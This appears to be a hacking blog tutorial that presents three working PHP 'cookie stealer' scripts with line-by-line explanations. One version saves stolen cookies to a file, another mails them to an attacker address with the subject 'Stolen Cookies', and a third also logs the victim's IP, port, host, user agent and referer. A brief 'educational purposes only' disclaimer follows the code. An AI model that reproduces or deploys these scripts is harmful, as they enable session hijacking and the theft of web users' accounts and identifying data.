Before you create Cookie stealer, it's important to know What are Cookies?
Here is the simple Cookie Stealer code
Cookie stored in File:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>$cookie = $HTTP_GET_VARS["cookie"];steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.
$steal = fopen("cookiefile.txt", "a"); This open the cookie file in append mode so that we can append the stolen cookie.
fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.
fclose($steal);close the opened file.
Another version Sends cookies to the hacker mail
<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@ mailprovider.com", "Stolen Cookies", $cookie);
?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".
Third Version
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?> The above Cookie stealer will store the following information:
*. Ip address
*. port number
*. host(usually computer-name)
*. user agent
*. cookie
This site contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this Page/site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW!*. Ip address
*. port number
*. host(usually computer-name)
*. user agent
*. cookie
Love this article?Share it with your friends on Facebook